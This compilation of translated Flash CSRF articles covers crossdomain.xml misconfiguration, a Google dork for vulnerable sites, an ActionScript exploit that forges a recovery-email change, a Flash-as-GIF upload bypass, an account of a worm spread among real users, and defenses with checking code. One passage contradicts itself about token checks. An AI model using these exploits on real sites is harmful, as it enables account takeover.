Flash CSRF: exploitation, attack and defense

Source: Internet
Author: User
Tags: http request, ssl certificate, subdomain, csrf attack, advantage

Flash CSRF: terminology

CSRF (Cross-site request forgery) is a malicious exploitation of a website: the attacker disguises requests as coming from a trusted user and thereby abuses the trust the website places in that user.

Flash CSRF is usually caused by an improperly configured crossdomain.xml file, which lets an SWF initiate the cross-site request forgery.

How Flash CSRF arises

Let us look at how Flash CSRF is found:

First we need to know how CSRF arises; the causes of Flash CSRF are roughly as follows:

The Flash cross-domain policy file crossdomain.xml is set to allow all hosts/domains to read and write this site's data across domains:

<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>

Because the filtering rule in the Flash cross-domain policy file is lax (domain="*"), Flash CSRF can be launched from any other domain.

How to find out whether a site has Flash CSRF

From the above we know that Flash CSRF results from an improperly configured cross-domain policy file, so we can open crossdomain.xml in the site's root directory to see whether the site (or a given domain name) is exposed to Flash CSRF:

http://www.xxx.com/crossdomain.xml

<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>

What Flash CSRF can do

Flash CSRF vulnerability lookup process:

Google hacking query: crossdomain filetype:xml

<cross-domain-policy>
  <allow-access-from domain="*" secure="true"/>
</cross-domain-policy>

secure="true" means that this domain's data may only be requested by SWFs loaded over a secure (HTTPS) connection.

I found that the first two results both require the SWF that reads the domain's content to be served from an SSL-certificate-encrypted site. I considered setting up an SSL website and then calling the Flash file from it, but it could not read their site's data or send POST requests. I found many such places, but nowhere to embed a Flash file. Just as I was getting discouraged, I found that the crossdomain.xml file under the blog's root directory actually allowed Flash from any host to read the data of that domain.

How Flash CSRF is exploited

Find a place where Flash can be embedded, embed our own Flash there, and visitors to that web page will execute the script we wrote.

Here is a concrete use of Flash CSRF: when a visitor opens our link, a security mailbox (the account-recovery e-mail address) of our choosing is automatically set on their account:

First submit a security-mailbox binding once, capture the packet to analyze what it submits, and then construct our Flash CSRF exploit code (no anti-CSRF token):

1. When applying for the security mailbox, the browser sends a POST request to the server; the request address and parameters are:

POST xxx.xxx.xx/xx.jsp?userid=xxxx&mail=dddd@dddd.com

2. Our earlier test of the security-mailbox feature showed that the server does not verify the Referer, but the page does verify the token, so we can take the POST packet's request address, parameter names, parameter values and token value directly and use them to forge the request that binds the security mailbox.

Exploit code:

package {
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.net.*;
    import flash.text.TextField;

    public class URL extends Sprite
    {
        public function URL()
        {
            // Read the current page to obtain the visitor's userid/token
            var echo_txt:TextField = new TextField();
            var targetUrl:String = "http://xx.xx.cc";
            var request:URLRequest = new URLRequest(targetUrl);
            request.method = URLRequestMethod.GET;
            request.data = "";
            sendToURL(request);
            var loader:URLLoader = new URLLoader();
            loader.addEventListener(Event.COMPLETE, completeHandler);
            function completeHandler(event:Event):void {
                // Extract userid and token from the page source (xxxx are the article's placeholders)
                var userid:String = ((loader.data + "").match(/\/xxxx\/mxxxx\.php\?xxid=(\d+)/) || ["", ""])[1];
                var masthash:String = ((loader.data + "").match(/\/xxxx\/mxxxx\.php\?masthash=(\d+)/) || ["", ""])[1];
                echo_txt.text = masthash;
                // Forged POST request that applies for (binds) the security mailbox
                var emailTargetUrl:String = "http://xxxxxx.xx.cc/xxxx/xxxx.jsp?mark=send";
                var emailRequest:URLRequest = new URLRequest(emailTargetUrl);
                emailRequest.method = URLRequestMethod.POST;
                var postData:Object = new Array();
                // xxxxx / XXX stand for the values read above, as in the original article
                postData[0] = "xxxx=xxxx@xxx.cc&xxxx=" + xxxxx + "&xxxxx=" + XXX;
                emailRequest.data = postData[0];
                sendToURL(emailRequest);
            }
            loader.load(request);
        }
    }
}

How to defend against Flash CSRF

In a nutshell: in the site's root crossdomain.xml, control cross-domain access to information precisely, down to the exact subdomain.

A sample crossdomain.xml permission configuration:

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="xx.xx.com" secure="true"/>
  <allow-access-from domain="cc.xx.com" secure="true"/>
</cross-domain-policy>

Change the crossdomain.xml configuration according to your business needs, and remember to be precise down to the subdomain; this greatly reduces the risk of Flash CSRF!

General Flash CSRF exploit: FlashCSRFexp.swf

Usage (in a real environment it is enough to load the Flash file for the code to execute, but the SWF file must be overwritten):

FlashCSRFexp.swf?url=http://www.xx.xx/x.jsp?&xx=xx&xx=xx&xx=xx&xx=xx
PS: url=[POST request address]&[parameter values, separated by &]



Flash CSRF attack: a popular-science account


At the end of 2008, on a dark night, when fanfou.com was China's first microblogging site, I was doing an authorized security test of the site, and one of the bugs set me thinking: how to make the most of it, how to launch a new kind of attack.

This vulnerability was CSRF (Cross-site request forgery), a vulnerability that could not be more common or more minor. I knew that exploiting it could let users be hijacked and then automatically made to do "bad things" they could not anticipate.

Because I am better at Flash (I made many small Flash animations at university), and because the ActionScript in Flash is also a client-side script that can do some bad things (isn't it just forging a few HTTP requests? For anyone who knows programming it is all too easy), I thought of using Flash as the carrier for a quiet attack:
1. I found an open-source Flash game (a "see again" game);
2. I modified the ActionScript code inside it, implanting code that would initiate forged HTTP requests;
3. I regenerated this evil Flash;
4. I posted it on my website;
5. I sent a microblog: "finally wrote my first Flash game: See Again, it wasn't easy ... Welcome to test it: HTTP://XXXX.COM/ENJOY_FLASH_GAME.PHP?HI=YYYY";
6. My friends saw it and clicked the link to play; wouldn't they find it quite fun? Haha.
7. While they played, the ActionScript code in the Flash executed and initiated a cross-site forged request. This request carried those people's cookies (the key point), so for fanfou it was a legitimate request, and it successfully carried out some evil operations: they all posted a microblog with the content ..., and also sent DMs to their friends;
8. And so it spread ...
It was a dark and windy night, yet it still spread, which shows how many night owls there are: in the half hour from 12:00 to 12:30 it spread very fiercely, the crowd grew tense, some people began to scold, some began to analyze, some began to question ...

The internet began to boil; I stopped, removed this evil Flash game, wrote a security assessment report for fanfou, and then wrote my first paper (the next day I went from Beijing to Alibaba to attend their first Jingwu Security Conference (also the only one); Thorn was the moderator at the time, and well-known hackers of the circle also came; my first talk was on the Flash CSRF worm). It was an internal meeting, so nobody knew what had happened at the time, long before I disclosed it.

After that, CSRF accomplished many classic attacks, such as taking over backstage admin privileges and attacking Gmail, bank sites and so on. CSRF defenses began to be popularized in the open-source web applications, and the major internet (SNS-type) sites began to notice CSRF's malicious attacks: at one time a single link could destroy all of a Renren user's blog posts, and a single link could take over a webmaster's site backstage. How much power the hacker holds in hand ...

Einstein was the biggest hacker.
IC (CEO of Knownsec) often repeats a famous quote of Einstein to us: "The world is dangerous not because of those who do harm, but because of those who watch them do it and remain indifferent." He says: "Einstein is the biggest hacker!"

Over the years we have kept trying to explain to web application vendors and webmasters how CSRF can be exploited, but we found they were mostly indifferent at first ... This is to be expected (think about how we react when others give us "domineering" advice). A security issue basically only starts to get attention once "they are touched by a harmless security assessment that proves the vulnerability is serious enough, and they act immediately after a dangerous hacking incident."


A statistic

Our website checkup center ran statistics for one cause of Flash CSRF vulnerabilities (whether there is a crossdomain.xml in the site root, and whether its allow-access-from is a wildcard; a wildcard means that any domain can obtain this domain's private data cross-domain) across the popular sites listed on hao123: 7,709 of them.


We found that 18% of the sites have a crossdomain.xml, and of those, 61% have Flash CSRF vulnerabilities.


Note: an insecure crossdomain.xml configuration lets any domain obtain this domain's private data cross-domain. Note also that if you want to send a POST request cross-domain, you still have to check whether the target form has token or verification-code protection, and whether the origin of the request is checked (for example, only POST requests initiated from within this domain are allowed).


Defense
The defense against this Flash CSRF is simple:
1. For a secure crossdomain.xml configuration, refer to one that specifies its trusted domains well:
http://weibo.com/crossdomain.xml;
2. Note: after installing Discuz!, this file in the site root is not secure by default, for example: http://bbs.uc.cn/crossdomain.xml;
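A small checker for the crossdomain.xml criterion used in the first article's "How to defend against Flash CSRF" section and in the statistic and defense items above. This is an added Python example, not code from the original posts: the two embedded policies are constructed samples, the function names are my own, and the "must be a hostname" finding reflects the policy format's domain attribute taking a hostname or wildcard rather than a URL.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies: the permissive default quoted in the article,
# and a tightened one that pins access to exact subdomains over HTTPS.
WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""

PINNED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="xx.xx.com" secure="true"/>
  <allow-access-from domain="cc.xx.com" secure="true"/>
</cross-domain-policy>"""


def audit_policy(xml_text: str) -> list:
    """Return the findings for one crossdomain.xml; an empty list means OK."""
    root = ET.fromstring(xml_text)
    findings = []
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append("wildcard: any site's SWF may read this origin")
        elif domain.startswith("*."):
            findings.append(f"{domain}: wildcard subdomain, pin to exact hosts")
        elif "://" in domain:
            findings.append(f"{domain}: domain must be a hostname, not a URL")
        # The policy format defaults a missing secure attribute to true; an
        # explicit false lets SWFs loaded over plain HTTP use the grant too.
        if rule.get("secure", "true").lower() != "true":
            findings.append(f'{domain}: secure="false" admits HTTP-loaded SWFs')
    return findings


def is_flash_csrf_exposed(xml_text: str) -> bool:
    """The article's yardstick: a wildcard grant means Flash CSRF exposure."""
    return any(f.startswith("wildcard:") for f in audit_policy(xml_text))


if __name__ == "__main__":
    for name, policy in (("wildcard", WILDCARD_POLICY), ("pinned", PINNED_POLICY)):
        print(name, is_flash_csrf_exposed(policy), audit_policy(policy))
```

Point it at the policy fetched from a site's root to reproduce the 61% statistic's criterion on your own inventory.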


As promised, a small Flash security testing tool is open-sourced here: https://github.com/evilcos/xss.swf; see the repository for how to use it.

We will continue with security popular-science pieces. If you have any questions you can send them to us on WeChat; we will take every message seriously and answer where necessary in the next issue. If you have any security gossip, you are also welcome to contribute it to us.


Science changes the world; let us work together to make the internet better and safer!




Flash + upload CSRF attack technique

CSRF attack and defense techniques are fairly mature, as I wrote in 2008 in "Bypassing CSRF prevention", http://www.xfocus.net/articles/200801/964.html. At present, most domestic applications and SNS sites defend against CSRF with a token + Referer combination, but Flash has an innate advantage in bypassing this kind of defense.

I. How Flash is invoked, and its domain

1. When HTML embeds Flash, the Flash file's extension can be changed.
2. Flash can also be accessed directly; the effect is similar to embedding it via HTML on the Flash file's own domain, except that the extension must then be .swf.
3. When Flash issues a request, the decision is based on the Flash file's domain, not the HTML page's domain:
   a. When Flash requests resources of its own domain, crossdomain.xml is ignored entirely.
   b. When Flash requests resources of a foreign domain, the policy restrictions of that domain's crossdomain.xml apply.

II. How Flash is invoked, and the Referer

When HTML embeds a Flash from a foreign domain, the Referer of the Flash's request is the Flash file, not the HTML page. [This does not cover scenarios where several Flash files load each other.]

III. CSRF attack scenarios and methods

1. CSRF caused by crossdomain.xml settings.

Many websites and applications [such as Discuz!] set crossdomain.xml as follows by default:

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>

In this way we can read the content of the attacked domain directly through a Flash on a foreign domain, and send back the key token that defends against CSRF.

2. CSRF caused by the upload function.

We mentioned above that when HTML embeds Flash, the extension can be changed. So we can rename the Flash file's extension to an image extension such as .gif and upload it to the attacked domain [an aside: PHP's getimagesize() also accepts Flash files, http://cn2.php.net/manual/zh/function.getimagesize.php]. Then, because "when Flash issues a request, the decision is based on the Flash file's domain rather than the HTML page's", and because the Flash with the .gif extension has already been uploaded to the attacked domain, the situation now fully matches case "a. When Flash requests resources of its own domain, crossdomain.xml is ignored entirely."

In addition, because "the Referer of a request sent by Flash is the Flash file, not the HTML page", the token + Referer check can basically be ignored in this scenario.

IV. Practical application

See "Discuz! Flash CSRF vulnerability".

In fact, a case of a Flash CSRF attack via the upload function appeared as early as 2008 in the Sodb project launched by 80vul, http://www.80vul.com/dzvul/sodb/03/Sodb-2008-03.txt. The reason for today's article is that some details there were not covered well enough, which led many people to misunderstand. For example, in sodb-2008-03 I used the uploaded file simply to bypass the Referer check, and ignored the point that "when Flash requests resources of its own domain, crossdomain.xml is ignored entirely." This matters a great deal for defense: even if you delete the crossdomain.xml file, you still cannot fully defend against the Flash CSRF attack.

V. Defense measures

This covers only defense against attacks in the upload feature scenario.

1. "Separating code and data is an important principle of security design" (Thorn). That is, strictly separate the domain that stores uploaded files from the domain that serves the web code; this suits large enterprises and application deployments.
2. Strengthen the checks on uploaded files, for example by examining the file header to determine whether the upload is a Flash file, and prohibit uploading Flash files.
3. Strengthen the handling of the Referer. Because the Referer of a request launched by Flash is the Flash file, when you rename the Flash to a .gif and embed it via HTML, the Referer of the request it launches is the URL of that Flash renamed to .gif, for example:

Yun_qi_img/1004333ntvhrv8vvy8lrc4.gif

POST http://127.0.0.1/Discuz_X2.5_SC_UTF8/upload/admin.php?action=members&operation=add HTTP/1.1
Host: 127.0.0.1
....
Referer: yun_qi_img/1004333ntvhrv8vvy8lrc4.gif
....

So I defended by identifying such uncommon file types in the Referer.
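Defense items 2 and 3 above in code, as an added Python example that is not part of the original article: is_flash_file() applies the file-header check (every SWF begins with FWS, CWS or ZWS), so a Flash renamed to .gif is still recognized, and should_reject_post() applies the Referer rule, treating a Referer whose path ends in an image or .swf extension as a request issued by an embedded object rather than a visited page. The requirement that the Referer be present and on the site's own host is an assumed policy, and the sample upload bytes and request headers are constructed.

```python
from urllib.parse import urlsplit

# Every SWF begins with one of these signatures: uncompressed, zlib, LZMA.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")

# A visited page never has one of these extensions, so a Referer ending in one
# was issued by an embedded object (such as a renamed Flash), not by a page.
SUSPICIOUS_REFERER_SUFFIXES = (".swf", ".gif", ".jpg", ".jpeg", ".png")


def is_flash_file(data: bytes) -> bool:
    """Defense 2: judge the upload by its header, not by its claimed extension."""
    return data[:3] in SWF_MAGIC


def referer_is_suspicious(referer: str) -> bool:
    """Defense 3: the Referer path ends in a file type that cannot be a page."""
    return urlsplit(referer).path.lower().endswith(SUSPICIOUS_REFERER_SUFFIXES)


def should_reject_post(headers: dict, trusted_host: str) -> bool:
    """Referer policy for a state-changing request (assumed policy): it must
    be present, on the site's own host, and must not point at a media file."""
    referer = headers.get("Referer", "")
    if not referer or urlsplit(referer).hostname != trusted_host:
        return True
    return referer_is_suspicious(referer)


# Constructed samples: a GIF-named upload that is really a compressed SWF, a
# genuine GIF, and the admin POST from the article with its disguised Referer.
DISGUISED_SWF = b"CWS\x0a" + b"\x00" * 12
REAL_GIF = b"GIF89a" + b"\x00" * 12
ATTACK_HEADERS = {"Host": "127.0.0.1",
                  "Referer": "http://127.0.0.1/uploads/1004333ntvhrv8vvy8lrc4.gif"}
NORMAL_HEADERS = {"Host": "127.0.0.1",
                  "Referer": "http://127.0.0.1/Discuz_X2.5_SC_UTF8/upload/admin.php"}

if __name__ == "__main__":
    print("disguised upload is flash:", is_flash_file(DISGUISED_SWF))
    print("real gif is flash:", is_flash_file(REAL_GIF))
    print("reject attack post:", should_reject_post(ATTACK_HEADERS, "127.0.0.1"))
    print("reject normal post:", should_reject_post(NORMAL_HEADERS, "127.0.0.1"))
```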
